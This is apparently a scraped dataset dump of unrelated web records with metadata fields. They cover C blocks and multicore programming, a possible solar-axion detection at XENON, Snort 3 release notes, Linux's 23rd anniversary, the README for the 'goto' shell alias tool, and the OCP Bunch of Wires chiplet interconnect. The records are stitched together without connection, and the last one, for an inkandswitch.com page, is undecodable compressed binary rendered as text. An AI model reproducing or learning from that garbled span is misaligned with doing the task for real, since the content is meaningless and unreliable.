pointers, but you use a caret (^) in place of the standard asterisk pointer (*). The block itself looks like a function definition, but is anonymous, and is embedded directly in the argument list. (Note that we named our ‘block’ in Python, but Python does also support anonymous functions.) ### Inside-Out Programming Another way to think about closures/blocks is that they allow you to rewrite the inside of functions, such as `EvalFuncOnGrid` in the example. I like to think of this as ‘inside-out programming’: Traditionally, you call functions from outside, and pass them what they need to get the job done. With blocks, you get to pass in the guts of a function, effectively rewriting it on the fly. ### Why Blocks? Why is all of this important, and why now? Well, as you are undoubtedly aware, there has been a vicious war raging the last few years, and it is only going to get worse before it gets better. That’s right — it’s the *War on Multicore*. Our chips no longer get faster, they just get more abundant, like the broomsticks in Disney’s Fantasia. Chipmakers just take existing designs, and chop them in half, and then in half again, and software developers are expected to do something useful with that extra ‘power’. It turns out that blocks could be a very useful weapon in the War on Multicore, because they allow you to create units of work, which each have their own copy of the stack, and don’t step on each others toes as a result. What’s more, you can pass these units around like they are values, when in actual fact they contain a whole stack of values (pun intended), and executable code to perform some operation. In fact, blocks could be seen as a low-level form of `NSOperation` . For example, if you are parallelizing a loop, you could easily generate blocks for each of the iterations in the loop, and schedule them to run in parallel, in the same way that `NSOperationQueue` does this with instances of `NSOperation` . The advantage of blocks is that they are at a lower level, built into the language, and require much less overhead. Stay tuned, because Apple undoubtedly has some big things planned along these lines in Snow Leopard. ## Leave a Reply
true
true
true
Last week, Chris Lattner — who manages the Clang, LLVM, and GCC groups at Apple — announced that work was well underway to bring ‘blocks’ to the GCC and Clang compilers. ‘So what?’, I hear you ask, ‘My kid has been using blocks since he was 9 months old.’ Fair point, but maybe not these blocks. A Demonstration of
2024-10-12 00:00:00
2020-04-15 00:00:00
null
article
macresearch.org
Mac Research
null
null
6,024,026
http://blogs.law.harvard.edu/philg/2013/07/10/ode-to-flight-attendants/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
23,571,546
https://www.businessinsider.com/dark-matter-experiment-possible-discovery-new-particle-physics-2020-6
An underground dark-matter experiment may have stumbled on the 'holy grail': a new particle that could upend the laws of physics
Morgan McFall-Johnsen
- A dark-matter experiment in an underground Italian lab may have discovered a new particle called the solar axion. - If that's indeed what was detected, it would be the first direct evidence of a particle that shouldn't exist according to the known laws of physics. - Alternatively, the data could also reveal new and surprising qualities of mysterious particles called neutrinos. - Larger, more sensitive experiments in the next year will help scientists figure out whether they have indeed discovered a new particle. - Visit Business Insider's homepage for more stories. An underground vat of liquid xenon in Italy may have just detected a new particle, born in the heart of the sun. If that's indeed what happened, it could upend laws of physics that have held fast for roughly 50 years. Researchers created the underground vat to search for dark matter, the elusive stuff that makes up 85% of all matter in the universe. Scientists know dark matter exists because they can measure the way its gravity affects faraway galaxies, but they've never detected it directly before. That's why an international group of researchers built the experiment at Italy's Gran Sasso National Laboratory. The vat is filled with 3.2 metric tons of liquid xenon, and those atoms interact with tiny particles when they collide. Each interaction, or "event," produces a flash of light and sheds electrons. In theory, this experiment is sensitive enough to detect interactions with particles of dark matter. In the latest version of the experiment, researchers expected the machine to detect 232 events within a year, based on known particles. But instead, it detected 285 events — 53 more than predicted. What's more, the amount of energy released in those extra events corresponded with the predicted energies of a yet-undiscovered particle called the solar axion: a type of particle that physicists have hypothesized exists but never observed. "The hypothetical particle that could potentially explain the XENON data is one that is much too heavy to be dark matter, but could be created by the sun," Sean Carroll, a physicist at the California Institute of Technology who is not affiliated with XENON, told Business Insider. "If that were true, it would be hugely important — it would be a Nobel Prize-winning finding." It's also possible, however, that the interactions were anomalies, which pop up all the time in highly sensitive physics experiments like XENON. ## A new particle forged in the heart of the sun Particle physicists study the smallest, most fundamental components of the universe: elementary particles like quarks and gluons, along with forces like gravity and electromagnetism. "Particle physics is an important part of modern physics, but it's also been stuck for a long while," Carroll said. "The last truly surprising discovery in particle physics was in the 1970s." That's when what's known as the Standard Model was established — a set of all the rules known to particle physics, which describe all the particles scientists have detected and how they interact with one another. "With it we can essentially explain every single thing we see in a particle-physics laboratory," Aaron Manalaysay, a dark-matter physicist at Lawrence Berkeley National Laboratory who is unaffiliated with XENON, told Business Insider. "It's probably the most accurate scientific model in history. But we also have good reason to think that it's not the most fundamental model of nature that exists." Physicists have hints that the model doesn't fully capture the way our universe behaves — their indirect observations of dark matter are among those hints. But they have yet to directly detect a particle that lies beyond the Standard Model. That's why it would be a big deal if XENON really has found a solar axion. "That would be the first concrete discovery of something beyond the Standard Model," Manalaysay said. "That's kind of the holy grail right now of particle physics." Carroll agreed — but he added that the unprecedented nature of the potential discovery "is one of the reasons we think it's probably not there." In other words, without further evidence, nobody is celebrating yet. For now, several other theories could also explain the extra events XENON researchers saw. ## Misbehaving neutrinos could point to a 'new physics' Another possible explanation for XENON's 53 extra events is that neutrinos — a subatomic particle with no electrical charge — could have driven the interactions. That would also defy the known laws of physics, though, since it would mean that neutrinos have a magnetic field much larger than what the Standard Model predicts. "That could point potentially to new physics beyond the Standard Model," Manalaysay said. It wouldn't be the first time neutrinos have broken the rules. According to the Standard Model, neutrinos shouldn't have mass — yet they do. The discovery that they have a sizable magnetic field would be yet another clue that something is missing from the model. "Neutrinos are really strange beasts, and we don't really understand them," Manalaysay said. ## Larger, more sensitive dark-matter experiments are coming It's also possible that XENON's extra events didn't happen at all — though that's unlikely. The researchers calculated a chance of two in 10,000 that the detected events were due to random fluctuation. The signals may have come from other mundane particle interactions, however, making their explanation far less interesting than axions or neutrinos. The extra events could have come from tiny amounts of tridium, a radioactive isotope of hydrogen, decaying inside the vat. Argon isotopes would produce a similar effect, according to Manalaysay. "It wouldn't take much. It would just take a few atoms," he said, adding that a number of other things unknown to the researchers could also be responsible for the excess interactions. "We've gone down this road before, where there's a little bit of an anomaly that you aren't expecting ... and then it goes away," Carroll said. "So this is clearly a place where you need to do a better experiment, and they're planning to do exactly that." A new generation of XENON-like experiments, currently in the works in the US and Europe, should help researchers study these extra events and determine which particles are causing them. That's because the new experiments will be larger and significantly more sensitive. "If this is real, we will absolutely see it in our next generation of experiments," Manalaysay said. He has worked with one such effort, called the Large Underground Xenon dark-matter experiment. "It's like you're going into a quieter and quieter room ... You start hearing new things you couldn't hear in a louder room." Whereas XENON picked up 53 unexplained events, the successor to LUX — called LUX-ZEPLIN — could detect 800, according to Manalaysay. Despite delays caused by the coronavirus, he added, new experiments will likely be running and returning results "within the next year." "It's like a teaser," he said. "The season's finale ends on a cliff-hanger, and you've got to wait until the next season."
true
true
true
If researchers have detected an axion particle forged inside the sun, the potentially "Nobel Prize-winning finding" would defy the laws of physics.
2024-10-12 00:00:00
2020-06-18 00:00:00
https://i.insider.com/5eeaaaa94dca683cb90f7db4?width=1200&format=jpeg
article
businessinsider.com
Insider
null
null
8,865,258
http://bytemaster.bitshares.org/article/2015/01/11/Introducing-SafeBot/?r=jaran
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
34,937,820
https://blog.snort.org/2023/01/snort-v31530-is-now-available.html
Snort v3.1.53.0 is now available!
Twillowkins
The SNORTⓇ team recently released a new version of Snort 3 on Snort.org and the Snort 3 GitHub. Snort 3.1.53.0 contains several new features and bug fixes. Here's a complete rundown of what's new in this version. Users are encouraged to update as soon as possible, or upgrade to Snort 3 if they have not already done so. Here's a rundown of all the changes and new features in this latest version of Snort 3: - appid: publish tls host set in eve process event handler only when appid discovery is complete - detection: show search algorithm configured - file_api: handling filedata in multithreading context - flow: add stream interface to get parent flow from child flow - memory: added memusage pegs - memory: fix unit test build w/o reg test Snort 3 is the next generation of the Snort Intrusion Prevention System. The GitHub page will walk users through what Snort 3 has to offer and guide users through the steps of getting set up—from download to demo. Users unfamiliar with Snort should start with the Snort Resources page and the Snort 101 video series. You can subscribe to the newest rule detection functionality from Talos for as low as $29.99 a year with a personal account. See our business pricing as well here. Make sure and stay up to date to catch the most emerging threats.
true
true
true
The SNORTⓇ team recently released a new version of Snort 3 on Snort.org and the Snort 3 GitHub . Snort 3.1.53.0 contains several new featu...
2024-10-12 00:00:00
2023-01-30 00:00:00
null
null
snort.org
blog.snort.org
null
null
14,309,930
https://medium.com/21st-century-architectures/cost-aware-architectures-8c07ed78d4d4
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
8,226,137
http://www.theregister.co.uk/2014/08/26/linux_turns_23_and_linus_torvalds_celebrates_as_only_he_can/
Linux turns 23 and Linus Torvalds celebrates as only he can
Simon Sharwood
This article is more than **1 year old** # Linux turns 23 and Linus Torvalds celebrates as only he can ## No, not with swearing, but by controlling the release cycle Linus Torvalds released issued Linux 3.17 rc-2 on Monday. Linux-loving readers will note that releasing on a Monday is not Torvalds' style. He usually releases on Sundays. The reason for the change is detailed on the Linux kernel mailing list as follows: “So I deviated from my normal Sunday schedule partly because there wasn't much there (I blame the KS and LinuxCon), but partly due to sentimental reasons: Aug 25 is the anniversary of the original Linux announcement ("Hello everybody out there using minix"), so it's just a good day for release announcements.” Which made yesterday the 23rd birthday of Linux. The release candidate itself is unremarkable: Torvalds says it is “All over the place … and nothing in particular stands out.” If you're really keen to have a look, Torvalds says it offers “60% drivers (drm, networking, hid, sound, PCI), with 15% filesystem updates (cifs, isofs, nfs), 10% architectures (mips, arm, some minor x86 stuff) and the rest is 'misc' (kernel, networking, documentation).” ® 54
true
true
true
No, not with swearing, but by controlling the release cycle
2024-10-12 00:00:00
2014-08-26 00:00:00
null
article
theregister.com
The Register
null
null
633,120
http://www.washingtonpost.com/wp-dyn/content/story/2009/05/15/ST2009051503494.html
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
1,106,401
http://nikgregory.com/2010/02/of-amazon-and-ebooks/
null
null
null
true
true
false
null
2024-10-12 00:00:00
null
null
null
null
null
null
null
7,198,739
http://www.winehq.org/announce/1.7.12
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
2,715,908
http://www.geek.com/articles/games/coming-soon-to-a-jailbroken-ipad-near-you-side-by-side-app-multitasking-20110630/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
30,676,873
https://www.imdb.com/title/tt10811166/ratings
The Kashmir Files (2022) - Ratings - IMDb
null
Menu All All Watchlist Sign In EN Fully supported English (United States) Partially supported Français (Canada) Français (France) Deutsch (Deutschland) हिंदी (भारत) Italiano (Italia) Português (Brasil) Español (España) Español (México) Use app Back Cast & crew User reviews Trivia FAQ IMDbPro All topics Ratings The Kashmir Files IMDb rating The IMDb rating is weighted to help keep it reliable. Learn more IMDb RATING 8.6 /10 575K YOUR RATING Rate User ratings Filter by Country Countries with the most ratings India United States United Kingdom Bangladesh Canada 9.4 Unweighted mean More from this title More to explore Most anticipated Indian movies and shows Percentage shows amount of top page views. Recently viewed You have no recently viewed pages Back to top
true
true
true
The Kashmir Files (2022) - Movies, TV, Celebs, and more...
2024-10-12 00:00:00
2024-10-12 00:00:00
https://m.media-amazon.c…Mjpg_UX1000_.jpg
video.movie
imdb.com
IMDb
null
null
162,639
http://blog.businessofsoftware.org/2008/04/business-of-sof.html
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
21,968,724
https://fuse.wikichip.org/news/3199/ocp-bunch-of-wires-a-new-open-chiplets-interface-for-organic-substrates/
OCP Bunch of Wires: A New Open Chiplets Interface For Organic Substrates
David Schor
# OCP Bunch of Wires: A New Open Chiplets Interface For Organic Substrates Previously we covered the Open Compute Project’s latest endeavor – ODSA – an industry-wide collaboration for the open standardization of chiplets. The group is pursuing the standardization of the entire architecture interface stack so that chiplets from different sources could seamlessly communicate with one another. Currently, there is a large focus in the industry on advanced packaging. Silicon interposers and silicon bridges are making their way to mainstream products. As advanced packaging makes its way to more products, new interfaces are being developed to more easily linked dies together. TSMC is introducing its LIPINCON interconnects and Intel has a number of interconnects including AIB and MDIO. The common theme among all those interconnects is that they are designed to go over silicon – and silicon is expensive. Even silicon bridges are significantly more expensive than a standard organic substrate. The OCP ODSA group is making the case, at least for some designs, a good old organic substrate works just fine. There is just one problem: there doesn’t actually exist a modern inter-die interconnect specifically designed for a standard organic-substrate-based multi-chip package with decent throughput and power consumption. The ODSA group wants to step in here and help. In addition to supporting existing open standards such as AIB, the group wanted to enable support for cheaper packages that do not rely on silicon. There are some good arguments for using multi-chip packages: they are cheap, mature, and highly reliable. Additionally, there is generally better screening for KGDs and because they can be spaced further, they exhibit slightly better heat dissipation characteristics. The major downside to all of this is that traces between chips are generally much wider, yielding lower wire density. This, however, at least in theory, could be compensated for with 6x-10x higher throughput. This is where the Bunch of Wires (BoW) comes in – and yes, that is its actual technical name! This is a brand new interface by the OCP ODSA group designed to address the interface void for organic substrates. Therefore the specs, testing, validation, and characterization for BoW have all been done on organic substrates. BoW has some fairly aggressive performance targets based on industry customer surveys for what they were looking for in an interface. In terms of throughput efficiency, they are going for 100 Gbps/mm to 1 Tbps/mm (die edge) with an energy efficiency of 1pJ/bit to 0.5pJ/bit – numbers that rival that of current-generation silicon interposes. Since dies are spaced apart, a trace length of 25mm to 50mm is required with a latency of sub-5ns. The group had a number of additional requirements such as it has to be relatively simple to design, especially on advanced nods such as 7 nm, 5 nm and 3 nm. The final requirement is that it uses a single supply voltage. In other words, it needs to use the same supply that the logic uses (i.e., standard Vdd rage of around 0.7V-0.9V) for maximum process compatibility. A simple unterminated lane (driver and inverter and a latch) implementation can already get up to around 5 Gbps/wire with wires up to 10mm in length. With a simple modulation such as NRZ it’s possible to get it up to 50 Gbps or even double that rate with PAM4. The problem with PAM4 is the undesirably high error rates, necessitating forward error correction (FER). This, in turn, increases both the power consumption of the links but also the latency. For the Bunch of Wires, the bandwidth of NRZ is doubled by using simultaneous bidirectional terminated lines. In other words, instead of using the bandwidth in just one direction over the transmission line, BoW signals are transmitted bidirectionally on the interconnection to double the effective data rate to around 100 Gbps without FEC. A proof of silicon has been fabricated on GlobalFoundries 14-nanometer process which reaches 28 Gbps in each direction for an effective bidirectional bandwidth of 56 Gbps/port. At the current target supply voltage of 0.75 V they are reporting a power efficiency of 0.7 pJ/bit. (Note that AQLink is the ultra-short reach SerDes by Aquantia). #### BoW Proposal For the Bunch of Wires, a couple of flavors are being proposed – BoW-Base, BoW-Fast, and BoW-Turbo. BoW-Base is the base implementation that has a range of under 10 mm. This is a very simple implementation with rates up to 4 GT/s using unterminated lanes. BoW-Fast (also called Plus) is a terminated version of BoW-Base but is still unidirectional. This implementation targets rates of up to 16 GT/s. Finally, the BoW-Turbo version uses the same data rate as BoW-Fast but utilizes simultaneous directional links to double the effective rate to 32 GT/s/wire. Both BoW-Fast and BoW-Turbo have a maximum trace length of up to 50 mm. Note that regardless of the BoW option chosen, the rate is capped at 16 GT/s in order to reduce the complexity of design and ease of port. It’s worth pointing out that all three implementations are actually backward-compatible. BoW-Turbo can always communicate with BoW-Turbo by default. In order to communicate with a chiplet that uses BoW-Fast, it’s only necessary to disable a single transmit/receive per lane which makes it fold back to unidirectionality. Likewise, to go from BoW-Fast to BoW-Base, it’s only necessary to disconnect the line termination. The BoW bump building block slice comprises 16 single-ended data bumps, differential clocks, a mode bump, and an optional error correction bump. A slice is 1170 µm x 320 µm (~0.4 mm²), assuming 130 µm bump pitch. If we do some back-of-the-envelope calculations, under BoW-Base, a single BoW Slice has an aggregated bandwidth of 64 Gbps, BoW-Fast quadruples this to 256 Gbps, and BoW-Turbo doubles that rate to 512 Gbps. That works out to 1280 Gbps/mm², not bad for an organic substrate. Of course, multiple BoW slices can be combined to increase throughput per die edge. It’s possible to stack up to around four slices on top of each other. So what about the control communication of BoW? We pointed out earlier that there is only a single mode bump. Instead of adding additional bumps for the sideband control/calibration state, a simple shared open-drain bump technique is used. Simply toggle the mode bit to switch between data and control. For one of the sides to go into calibration mode, the mode bump is pulled down. Otherwise, the data bumps are assumed to be in standard data mode. #### Chiplet Interconnect Comparison On GlobalFoundries 14-nanometer process, current proof of concepts shows an energy-efficiency of around 0.7 pJ/bit. They estimate this can be reduced to 0.5 pJ/bit on a 7-nanometer node. Current Chiplet-based Demos | |||| ---|---|---|---|---| Company | Intel | AMD | TSMC | OCP ODSA | Chip | Stratix 10 | Zen | VLSI Demo | This | Packaging Technology | EMIB | MCP | CoWoS | MCP | Channel | 1 mm | N/A | 500 µm | N/A | Chiplet I/O Bumps | 55 µm | 150 µm | 40 µm | 130 µm | Interconnect | AIB | IF | LIPINCON | BoW-Turbo | Data Rate | 2 GT/s | 10.6 GT/s | 8 GT/s | 32 GT/s | Power | 1.2 pJ/bit | 2 pJ/bit | 0.56 pJ/bit | 0.7 pJ/bit | It’s worth highlighting that BoW is designed for standard multi-chip packages with a bump pitch of around 130-micron yielding a bump density of just 68 bumps/mm². More recently, Intel unveiled the MDIO interconnect which has much more aggressive shoreline bandwidth density. Nonetheless, BoW makes up for it with higher data rates. The final result is that, against the current generation of interconnects, with the ability to stack up to four slices, BoW provides slightly lower areal bandwidth density but higher shoreline bandwidth density. Current Chiplet-based Interconnects | |||| ---|---|---|---|---| Company | Intel | Intel | TSMC | OCP ODSA | Package | EMIB | EMIB/ODI | CoWoS | MCP | Interconnect | AIB Gen1 | MDIO Gen1 | LIPINCON | Bow-Turbo (3 slices) | Data Rate | 2 GT/s | 5.4 GT/s | 8 GT/s | 16 GT/s | Shoreline BW Density | 504 Gbps/mm | 1600 Gbps/mm | 536 Gbps/mm | 1280 Gbps/mm | PHY Power | 0.85 pJ/bit | 0.5 pJ/bit | 0.5 pJ/bit | 0.7 pJ/bit (14nm measured) 0.5 pJ/bit (7nm estimate) | Areal BW Density | 150 GBps/mm² | 198 GBps/mm² | 198 GBps/mm² | 148 GBps/mm² |
true
true
true
A look at a Bunch of Wires, a new open standard chiplets interconnect being proposed by the OCP ODSA group intended for standard organic multi-chip packages as a cheaper alternative to silicon interposers and bridges.
2024-10-12 00:00:00
2020-01-05 00:00:00
https://fuse.wikichip.or…/bow-demo-fi.jpg
article
wikichip.org
WikiChip Fuse
null
null
9,763,982
https://vimeo.com/131526075
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
29,544,035
https://readme.security/how-to-hack-a-satellite-209bc9b0a0a0?gi=bef659057f72
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
29,947,442
https://sad.pub/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
16,770,826
https://github.com/iridakos/goto
GitHub - iridakos/goto: Alias and navigate to directories with tab completion in Linux
Iridakos
A shell utility allowing users to navigate to aliased directories supporting auto-completion 🐾 User registers directory aliases, for example: `goto -r dev /home/iridakos/development` and then `cd` s to that directory with: `goto dev` `goto` comes with a nice auto-completion script so that whenever you press the `tab` key after the `goto` command, bash or zsh prompts with suggestions of the available aliases: ``` $ goto <tab> bc /etc/bash_completion.d dev /home/iridakos/development rubies /home/iridakos/.rvm/rubies ``` Clone the repository and run the install script as super user or root: ``` git clone https://github.com/iridakos/goto.git cd goto sudo ./install ``` Copy the file `goto.sh` somewhere in your filesystem and add a line in your `.zshrc` or `.bashrc` to source it. For example, if you placed the file in your home folder, all you have to do is add the following line to your `.zshrc` or `.bashrc` file: `source ~/goto.sh` A formula named `goto` is available for the bash shell in macOS. `brew install goto` `echo -e "\$include /etc/inputrc\nset colored-completion-prefix on" >> ~/.inputrc` **Note:** - you need to restart your shell after installation - you need to have the bash completion feature enabled for bash in macOS (see this issue): - you can install it with `brew install bash-completion` in case you don't have it already - you can install it with - Change to an aliased directory - Register an alias - Unregister an alias - List aliases - Expand an alias - Cleanup - Help - Version - Extras - Troubleshooting To change to an aliased directory, type: `goto <alias>` `goto dev` To register a directory alias, type: `goto -r <alias> <directory>` or `goto --register <alias> <directory>` `goto -r blog /mnt/external/projects/html/blog` or `goto --register blog /mnt/external/projects/html/blog` `goto` **expands**the directories hence you can easily alias your current directory with: `goto -r last_release .` and it will automatically be aliased to the whole path. - Pressing the `tab` key after the alias name, you have the default directory suggestions by the shell. To unregister an alias, use: `goto -u <alias>` or `goto --unregister <alias>` ``` goto -u last_release ``` or ``` goto --unregister last_release ``` Pressing the `tab` key after the command (`-u` or `--unregister` ), the completion script will prompt you with the list of registered aliases for your convenience. To get the list of your currently registered aliases, use: `goto -l` or `goto --list` To expand an alias to its value, use: `goto -x <alias>` or `goto --expand <alias>` `goto -x last_release` or `goto --expand last_release` To cleanup the aliases from directories that are no longer accessible in your filesystem, use: `goto -c` or `goto --cleanup` To view the tool's help information, use: `goto -h` or `goto --help` To view the tool's version, use: `goto -v` or `goto --version` To first push the current directory onto the directory stack before changing directories, type: `goto -p <alias>` or `goto --push <alias>` To return to a pushed directory, type: `goto -o` or `goto --pop` This command is equivalent to `popd` , but within the `goto` command. From version **2.x and after**, the `goto` DB file is located in the `$XDG_CONFIG_HOME` or in the `~/.config` directory under the name `goto` . If you updated from version **1.x** to **2.x or newer**, you need to move this file which was previously located at `~/.goto` . *Note that the new file is not hidden, it does not start with a dot .* In case you get such an error, you need to load the `bashcompinit` . Append this to your `.zshrc` file: ``` autoload bashcompinit bashcompinit ``` ~~Test on macOS~~extensively- Write tests - Fork it ( https://github.com/iridakos/goto/fork ) - Create your feature branch ( `git checkout -b my-new-feature` ) - Commit your changes ( `git commit -am 'Add some feature'` ) - Push to the branch ( `git push origin my-new-feature` ) - Make sure that the script does not have errors or warning on ShellCheck - Create a new Pull Request This tool is open source under the MIT License terms.
true
true
true
Alias and navigate to directories with tab completion in Linux - iridakos/goto
2024-10-12 00:00:00
2018-03-04 00:00:00
https://opengraph.githubassets.com/720c501c7265ba4bd0fa0367b4d0588aa76a3f8e517f528e7c46426077d43e24/iridakos/goto
object
github.com
GitHub
null
null
38,366,695
https://www.inkandswitch.com/embark/
null
null
(�/�XTC��2qH m�t n@ � @;��$�傷ĸ�&2e�2�-D��w�r~hp���4�&�����*���Ƞ?*�M� !V\���y2\M�8H���:�>��F.��IB�J6ؚť(z��e� ��������%?;-'E����3���m��t"I3Ԙ;�qD�K�L���N��C����컈�5���g�f�;Mc������zD�l'����ϻ��+��f0�8�YU��^ņ�cq�GŚ➛]wDJ��43�L�� �R7�8�]�\'����fbǕ���qx*^e3��eu)�!�X��Q�g���r(J3�|�5k�8�Qi�fw��&�*�:A'�y���U�1|@��Zp��C�ጡ����°⯏.%�W&����D�E��� ��n�#r-�\�"���hh�6A<� �V:�K�Ydnq�� ��v� eTH.*��n]>�VB�!���E��8 ���1�A����n�?\Nt�-c�%�!����N�U�w~8�&�� �xnH�Ţ�Qӥc��mS��Ed�Y���i~�3|O-�~�=;����q��n�2�NXH>�פ숃&�r�`�T�K��� <'=B���A `l�8,PP�Pr�k"v&�f�rrs� w���7=��#t�'-<[��Z��������T:GkQ�\̃Um[��9 �sI3�s�����r�1��.��窷�.��F�gsjS� ���\��,�=|a�1|ѧ6N��Uo�6��i�u�[�ofٗ!V��)�1t$���s���N�ጃ4��_~c'\�if���ި6&��:9'i�=<�Q��n�Z�Û�U8�e;J�E�A�I3��<'��s�sRcz���A<�=&s9�O�����ܦ�o!V�� u�]�� y��*�z���]l���"�:�-^:3���Z�٥���~�a"l�� �b��ڬ�_6^KP���|�*7�`�g��0�[K�{t��:PK�K���e}����b��E�Y}2A$;���� ���F���E��}[������k���7�{H���?��.�[L�5��{0�?�t�{�bj�5cp���\gӸ/'�N��?g/�_�9�|\U͜��~����6����:��1"�b� �|�',,PP����� w�`�G?����n���l��l y��Ά�w�E�\81Q�%C�O �V� ��.�j�&&*ؿ�k�"�7��5I�p�+�_�Eđ ~�|8�q�d1��u�sp�ˁ]�+Z��jN���3aQ����t*L'R�XD��PF?��@!��R��b��ţ?B�㺖�*,x���y�������7���P�2�p�8�r�(Y�@41Q���YݒE�����]9��s^������5��Yu���EkaS�X�g��SU4��}'�f %�t�� p`h^���L��+*w�)�Ƞ+�gI������c� ��PXР��,��m�A( ��Tp`��@]qR�Wr1�� 8)d9����-}���(�H��>�� �+��g:�+z�E��6��Ν&�E�_f�A�0Ar-����yLH���Ow�p``��s(��V�IV��]��k1��H������\�\Y���%�NRap^)�����J�80�;aዋ]�*�皙��|ZbuI�肫�4.��H��w @a�90|z��?����XD�8�)�����c!��w.Y� ,��ar����!Qs��零S�V:LS�w���r���o8eg�t�[�c�N�S�� ^���N�?|�������q�XLߪ�C�ℍi�:Т�����Pc� ����Z���C#�U=\e�Wp�s�2��\[�QwL�g\�y�����dѺf5�lXu���׆�c��[]T��x��d �7�����ifV�-���wJ�T�u�'GvѢRm*�iV����|� �c�WQ�#Ӥ�p�{,F�%� 1|A�(�X)ͦ���1�������s����i���-`�#� ����S��Y�Pq�{|8�k���e�>�\��Un2�.f\7��_�Z�;%)��V2?��Ƹ��>n1���l{'i�[Vw.�;;j1�������:�d��Sm��s�3L�e��=J�8��C�!������RY�Gʎ8_��<�E L�D!T�L% A6�Wv8����]�k��!�Z^�b>�,"8��O��PS��Nʇ���:�`�{�D3R����I�?(�o|O*�����eu�D+��\K�����\BD�b�Oh��B�Lx.e&~3��(HCHvch��T�t\�ܥ���O�������l���r)��>��s����L�p��I.��7�f�$d����x����㌅�Ye�A�tGd�b��I�_�x�Z>�K��k� ��X)B��c����!�Q��B�4r�/Z�=�ʄ����V1��\����Ω��N��"��/!���{$��ɡ܋�&e��!Y �:7�� ��E��@�^��o�u��9Ŗ4�7���/Z���V�S�ع����w�xLf�Ί��� 1t\>�$?���eG�� ���bͣ�V&, �n�y8]�Ͻ^�4�����6�wR{�b�����g�r/"7� �BQ&�p֔��s��1)����_�(<(�Ì�x�pn֏g����b�b��#�7�o���[̟�AQ� �#��i�� '��p�>ȃ��{K�ky�o���No�b.���\Nτ~�Yn�l^���eGk5F"�o ���G�px͇ !eav��d��2���t��y�\��\�t�|'�4�����l��]�>�W���6n��0�! $L�P�]�UFq����T#��`7� �*s75�ɾ�S�B�V3t OO�Z���ArP�k���I�ϓE�q�.Wü V��w�{澋��Xp,8�X���:��s�˹�|����8ȶs]ŇժK���ldsY?לhh~%��2�.R n�����=- B���8�u�G�$!�� <�E'1z��N%��V�\��ɾ�4��\�����7���tX^����9c�ٍ�$��IV��x�$��Jo�r��čɾ.��y�`Z��_�s�Iu 5�U�Ǜ��ȐO���prU�q�t��q� ��D[]��i~?�����Zԝ�1|��UH�yg,�׃��B����+�2��� v|1)Lg)v���Gz�?>�#S"�i�aO��B�c1���t�鸾��|T�]�!S�x��^�Y��~o�x�o�yj��{^�� W�K�k 8cx�{���e��Ʒ���6�U���2���|t���f�1� Z�`箪kfV/v�5�W�bn.�ˉ�Jݜ,�{��s9�U�}�ru.�G'�U�|\ٷ�s�~�J}99��^'� �ь��t�,B�Mm�\�\m��e��fJsw�bU����C����=r�e��7�����՜�2;TJ�y[���L�1rr��ehdgP�GvI��p6��z�ӿ��J!����ZL�+0>\���,���s��^p�48�k�ExИå /T匙@a��t-�5;б|�f����
true
true
true
null
2024-10-12 00:00:00
null
null
null
null
null
null
null